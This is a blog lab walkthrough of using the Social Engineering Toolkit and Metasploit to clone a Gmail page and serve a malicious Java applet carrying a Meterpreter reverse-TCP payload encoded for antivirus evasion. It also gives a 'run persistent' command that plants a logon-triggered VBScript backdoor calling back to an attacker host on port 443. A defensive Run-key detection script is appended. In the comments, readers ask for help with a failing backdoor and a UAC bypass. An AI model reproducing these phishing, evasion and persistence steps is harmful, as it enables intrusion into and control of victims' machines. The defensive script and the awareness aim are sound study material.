Social Engineering Toolkit and Metasploit: Web cloning attack and uploading a backdoor

Choose 1 for Social-Engineering Attacks.

Choose 2 for Website Attack Vectors.

Choose 1 for Java Applet Attack Method.

Choose 1 for Web Templates.

Choose 2 for Gmail.

Choose 2 for Windows Reverse_TCP Meterpreter as the stager.

Choose 2 for shikata ga nai encoding for AV detection evasion. Metasploit encodes the payload 4 times to avoid AV detection; the target machine in this lab has no AV, so encoding is not strictly necessary here.

The payload is encoded 4 times; however, this number of iterations is far from enough, and AV can still detect the payload easily. SET makes interoperating with Metasploit really easy.

The cloned web server is ready to accept connections from any victim.

In the past I used to click on unknown Java pop-ups, as I did not know the implications of clicking them blindly. If the victim is not cautious and clicks on this unknown Java applet, the payload will be uploaded to the victim's machine.

This is what happens on the attacker's machine if the unknown Java applet is clicked by the victim: 2 Meterpreter sessions are created.

sessions -l lists the available Meterpreter sessions.

sessions -i interacts with the chosen Meterpreter session.

If the attacker wishes, a cmd.exe can be spawned as a hidden process.

Creating a persistent backdoor

You can choose where to plant the backdoor, when the backdoor should start, and which address it should connect back to.

run persistent -A -L c:\Users\cyrus\Downloads -U -p 443 -r 192.168.20.13 This command instructs that the backdoor VBScript shall be uploaded to c:\Users\cyrus\Downloads and activated once the user logs in, and that the VBScript will connect back to 192.168.20.13 on TCP port 443.

This is the VBScript uploaded to the victim's machine from the attacker's machine via the Meterpreter session.

All Meterpreter sessions were lost because the victim had rebooted his machine.

A new Meterpreter session (session 4) is created after the user has logged in.

The attacker spawned a cmd.exe on the victim's machine.
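From the defender's side, the persistence step above is the most detectable part of the chain: the post states that the VBScript is dropped into the user's Downloads folder and started at logon, and per-user logon autostarts normally live in the HKCU Run key. The following script is an added example (not code from the original post or from SET/Metasploit) that scans the text layout `reg query` prints for a Run key and flags entries that launch a script via Windows Script Host or from a user-writable path. The registry output, the value names and the file names in it are constructed for the example; the key path is the standard per-user Run key.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample in the layout `reg query HKCU\...\Run` prints; the entries
# and file names are invented for this example, not captured from the lab above.
SAMPLE_REG_OUTPUT = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Program Files\Microsoft OneDrive\OneDrive.exe" /background
    cyrus_upd   REG_SZ    wscript.exe "C:\Users\cyrus\Downloads\xyz.vbs"
    Updater     REG_SZ    C:\Users\cyrus\AppData\Local\Temp\svc.vbs
"""

# One indented line per value: <name> <REG_type> <data>
ENTRY_RE = re.compile(r"^\s+(?P<name>\S+)\s+(?P<type>REG_\w+)\s+(?P<data>.+?)\s*$")

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
SCRIPT_EXT_RE = re.compile(r"\.(vbs|vbe|js|jse|wsf)\b")
# Directories an unprivileged user can write to; a legitimate autostart rarely lives here.
USER_WRITABLE_MARKERS = ("\\users\\", "\\appdata\\", "\\temp\\", "\\downloads\\")


def parse_run_entries(text: str) -> List[Dict[str, str]]:
    """Parse `reg query` output into a list of {name, type, data} dicts."""
    entries = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("HKEY"):
            continue  # skip blank lines and the key header
        match = ENTRY_RE.match(line)
        if match:
            entries.append(match.groupdict())
    return entries


def classify(entry: Dict[str, str]) -> List[str]:
    """Return the reasons an autostart entry looks like a script-based backdoor."""
    data = entry["data"].lower()
    reasons = []
    if any(host in data for host in SCRIPT_HOSTS):
        reasons.append("invokes Windows Script Host")
    if SCRIPT_EXT_RE.search(data):
        reasons.append("launches a script file")
    # A path alone is not suspicious; only flag it when a script is being run from there.
    if reasons and any(marker in data for marker in USER_WRITABLE_MARKERS):
        reasons.append("script located in user-writable path")
    return reasons


def find_suspicious(text: str) -> List[Tuple[str, List[str]]]:
    """Scan Run key output and return (value name, reasons) for each suspicious entry."""
    hits = []
    for entry in parse_run_entries(text):
        reasons = classify(entry)
        if reasons:
            hits.append((entry["name"], reasons))
    return hits


if __name__ == "__main__":
    for name, reasons in find_suspicious(SAMPLE_REG_OUTPUT):
        print(f"{name}: {', '.join(reasons)}")
```

In practice you would feed it the output of `reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"` (and the HKLM equivalent) collected from the host, and pair a hit with the outbound connection the script makes at logon, which in this lab is to port 443 on a non-web host.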

Afterword

Modern antivirus programs are capable of detecting such a backdoor and even preventing the download of the encoded payload onto the victim's machine; a payload encoded by shikata ga nai 4 times is not enough to evade most modern antivirus programs.

In the past I used to click and execute unknown Java applets without knowing the implications. This post is a simple and straightforward lab demonstration to create awareness among people who do not understand the implications of their actions when they click on something they do not understand.


6 Responses to Social Engineering Toolkit and Metasploit: Web cloning attack and uploading a backdoor

  1. MapEndo says:

    Hello,
    would you tell me what is the windows set up? I am receiving the following error from Microsoft :
    Error : Permission denied
    Code:800A0046
    Source:Microsoft VBScript runtime error.
    I browsed the net and I found that it might be related to the UAC but my UAC is deactivated.
    Could you help me? Thank you

  2. cyruslab says:

    Hmm.. I have not received this error before, were you trying to plant a backdoor? In fact when I did the SET + Metasploit thing with Win7 I did not deactivate UAC at all.
    What exploits were you trying to use? Perhaps I could replicate your method and see if there is this error or problem with Win7 Pro?

  3. MapEndo says:

    I am using the Java applet and the payload is Meterpreter reverse tcp. And I am using Win7 Pro without SP1. From the error I understand that the script is not allowed to run. I tried it on Windows XP it works without a hitch.
    And the window which pops up is named : Windows Script Host…
    Thanks for your help

  4. MapEndo says:

    And another question, I do not understand what's going on with my SET. The script to bypass UAC is not working properly. I have updated SET and Metasploit as well. Do you have any ideas what may be the problem? When I run the script I do not have a new meterpreter session where the UAC is disabled.
    Thank you

  5. cyruslab says:

    I have no idea about the problem yet unless I encountered it. I will try to do the security lab and see if your problem can be replicated or not.

  6. Allen says:

    Nice work. Keep it up.

    And this is also good video maybe you like it

    http://www.securitytube.net/video/2684
